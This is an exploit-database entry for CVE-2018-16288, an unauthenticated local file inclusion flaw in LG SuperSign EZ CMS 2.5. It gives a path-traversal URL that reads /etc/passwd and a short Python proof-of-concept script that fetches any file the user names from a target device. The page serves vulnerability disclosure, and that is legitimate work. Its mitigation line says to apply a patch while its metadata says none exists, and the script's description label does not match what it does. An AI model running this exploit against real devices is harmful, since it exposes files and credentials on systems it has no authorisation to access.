header-logo
Suggest Exploit
vendor:
SuperSign EZ CMS
by:
Alejandro Fanjul
8.6
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: SuperSign EZ CMS
Affected Version From: 2.5
Affected Version To: 2.5
Patch Exists: NO
Related CWE: CVE-2018-16288
CPE: a:lg:supersign_ez_cms:2.5
Metasploit:
Other Scripts:
Tags: cve,cve2018,lfi,supersign,edb
CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Nuclei Metadata: {'max-request': 1, 'vendor': 'lg', 'product': 'supersign_cms'}
Platforms Tested: Web OS 4.0
2018

LG SuperSign EZ CMS 2.5 – Local File Inclusion

Any user can read files from the TV, without authentication due to an existing LFI in the following path: http://SuperSign_IP:9080/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd

Mitigation:

Apply the vendor's patch or update to the latest version of LG SuperSign EZ CMS.
Source

Exploit-DB raw data:

# Exploit Title: LG SuperSign EZ CMS 2.5 - Local File Inclusion
# Date: 2018-09-13
# Exploit Author: Alejandro Fanjul
# Vendor Homepage: https://www.lg.com/ar/software-lg-supersign
# Version: SuperSign EZ (CMS)
# Tested on: Web OS 4.0
# CVE : CVE-2018-16288

# More info: http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html
# Any user can read files from the TV, without authentication due to an existing LFI in the following path:

# http://SuperSign_IP:9080/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd

# PoC

import requests
import re
from argparse import ArgumentParser

parser = ArgumentParser(description="SuperSign Reboot")
parser.add_argument("-t", "--target", dest="target",
                        help="Target")
parser.add_argument("-p", "--path", dest="filepath",
                        help="path to the file you want to read")

args = parser.parse_args()
path = args.filepath

s = requests.get('http://'+ str(args.target).replace('\n', '') +'/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'+str(path))
print s.text